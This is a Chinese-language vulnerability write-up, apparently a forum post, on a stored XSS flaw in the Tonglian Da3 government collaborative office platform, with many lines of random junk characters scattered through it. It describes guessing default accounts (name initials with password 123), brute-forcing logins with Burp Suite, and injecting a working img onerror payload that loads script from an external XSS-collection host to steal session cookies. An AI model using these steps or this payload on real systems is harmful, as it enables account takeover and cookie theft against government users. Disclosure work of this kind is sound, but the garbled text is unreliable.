% \; B$ V# n. A' I2 K , [, n7 N1 }- a8 T( x
同联Da3协同办公平台后台通用储存型xss漏洞
# |1 ~& { U+ I, A, I0 t" |
8 t2 j E9 A) X5 Y) C3 Z : a: z" A) C- S# w9 g) H
平台简介:
6 n$ |/ _' x2 m$ p+ _0 Z
* f# e' E- w% T! R
: V' {7 G8 A% Q / V7 A# ]" t+ B5 {: s5 r! E
# z4 v0 H* f, a( t
, l( C& ~. [6 k# X 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! T+ y( v, c5 F- }同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 S8 d# E ^! @4 R% n5 l G4 O* ?同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' X2 E; c( v( g: L
! }6 O! G D; M( U% ?* f
2 c' o7 q& b1 k0 _# X9 j5 V
; O P1 N0 {0 k& j6 ]+ l4 q! f
, u# {% J. Z- z ; Z/ y* x0 \6 {5 Y2 \# b0 j% u+ u
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:$ t, V" U! S! d: z8 h( |
" B7 {" F, K6 t* V' ?
# Q6 h' j& b- z8 N0 c. o
* C( C1 Z- d- P# l) W; X- @& H
. S E" W" T/ ~+ h7 z
% ^/ q" o3 X7 f% l" B# r
http://1.1.1.1:7197/cap-aco/#(案例2-)
9 \. i; r+ T( v* ?+ X$ g& R
% `9 i& K( ^* p) R* m; J# [
4 j/ \" x# n3 L3 a3 w* B http://www.XXOO.com (案例1-官网网站)
: Y( X7 @3 n7 z$ W
6 ]4 }$ x* p E( I6 j8 Z $ }0 V8 i/ B: W Y
漏洞详情:! `% t- Y4 A/ i, F3 }
6 N3 r$ e, k$ L8 S$ `& K i$ K9 ]1 e6 {. ?. t
案例一、: P! R1 K; i/ [, q/ A/ {% T: z$ @# c
. c4 }5 A, Q. a- x
- g2 t. }' O5 M/ ^* z5 h7 i
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
( A1 ?; h7 }% o" z
, `/ X l: j! j, q a
. m& m7 y* h9 P1 o3 g: p
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
& h3 k0 N$ Y# |- N a
, D& O2 n* ? c* Y( P1 }
5 J& I, s1 i: [7 V, g3 a2 W* u
$ _- [ m" T n& ?. y' x3 ^8 d0 W
" _2 f# ^% C% `9 }" P1 K3 C2 o 1 ~/ j3 e, @3 x6 f4 C4 G. G
7 N7 Y$ i5 I" M6 w: W
, c' x3 _& [% e) a1 }& |7 ~* F 0 K2 F4 x' K" j
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 7 x+ j- X p( Z7 C, n
8 k' X& N0 u5 q) y- u
& a* e1 a" s) Q K& H$ ^
5 o5 Y/ B- ~' F
0 s. p3 ~" y" A) I( I, E2 U! v 0 \2 `$ C- ~3 g, Y! R. d1 o
9 m' Y' m/ J! e& U" K# ?
2 {# T3 M: S6 L. h / m3 P4 Z4 ]1 G0 X# J, y9 a: O1 m
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
% E+ R! i2 w9 |9 c+ ^
4 b( k5 K0 z% a; B( ?
+ i" I: U9 D8 S; O- f* `
3 f% ~9 w1 |: q" l5 T6 C9 M C
( {% x: j- S! f! ^
- d- ]! n9 S( e1 ]! [: @ <img src=x3 R; N2 P: t' t6 s# b% r4 y1 R
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
2 x! ]- P/ U3 A# ]) {
5 v6 l: N( @: [4 [! u: ?/ d) t . X+ R; ~/ y: R$ J
/ {# `. x. A3 B( y% J5 v, T
# W* G& V1 D% T$ w0 x4 i* ?
% K3 r+ k7 T) N& T' q. _; a* [
然后发送,接收cookie如图: ' ]7 S. @! i. M% z- [2 S0 x
t$ C$ U, ~' U; l: ?
; s8 o5 f {- ^# { ( [3 k2 z/ f5 [ v
6 D8 t' P5 B& e* B # R2 ?5 S' Z- P! M/ Q3 R6 o2 W) V
1 g" P6 @+ n- h; n% i$ _) Q
4 _4 u0 W$ o3 X
0 ?/ C6 b' D0 f: Z% X# A 5 \- S" c& j; g5 B S
/ k# X9 c, s9 i
5 @2 U* H% m' m6 A; P) v * O; e% E( P( n7 Z) b4 G4 L3 c
; u- V' Z9 s' D) g+ Z4 B1 c 2 s* K8 m, F& w. l
; i1 l0 r. }0 k6 [
8 o3 ^. p- I* F( R8 L
. \3 G9 s9 p. U5 g
9 \: @ M+ b! r
1 n' w( ^, B. P q4 e
* m. c6 d& t1 l6 D# S0 O
6 H8 `. }, l& `' H) c* O( E
" e, n3 z) M- ^: C* w# Y$ `- d4 W# s
, p" t) c. I# C+ J% K1 ]- o: J2 g
案例2、
# L% ~ i# o; j( J
6 o q' y6 h3 |, S
" D; n6 g5 A) `5 t; p8 I! i
前面步骤都一样,下面看效果图: ! E+ F, F; x( f P l
) M, I& [: Q D; e7 K( @8 a
6 X, k' E% {9 @4 N
& w+ u$ c U7 D" H$ F4 m
0 W% E0 t' G0 W" S! F/ N% \
/ [8 P6 V: j) T3 O- y7 U
5 |. B x4 _' u8 _1 n/ ?* W/ r
$ n( `" u2 \8 f( K. e7 J
5 b; u v) x: z& n' e0 }# } 2 o0 |! M8 _7 k5 w: b' g
9 x/ {1 L2 h4 h% |, Y* ]
& E4 d: k8 g2 l8 ]7 Q$ y& K * l# ]# k: z$ @' D
' C8 H5 x1 t4 F% l3 D
4 j$ p+ H; P( B
' k; f; }, k0 E6 @
9 r0 M5 w6 ] N \; N. R
) A' c) W: `; v5 M W |3 d# y & q: a, [9 D7 ^, C( T: v( n& d# H
0 Z' D ^$ ~5 e! L, P% d& o
& @ j' h2 H6 i/ A& p# @( |" y
. c6 A+ u+ J& A
# ]3 q5 s; {7 k# [+ D- E# \5 m0 C: s
) S8 q' G$ r' H
/ e+ e' ^: ]7 n5 x8 x- \
$ L+ z9 }: ~3 X2 _8 c0 z
) k9 T9 @2 w3 L% S2 i, _% d: _ ' U& N6 ^+ x3 u9 F
. J0 ?! m( t/ J Z# f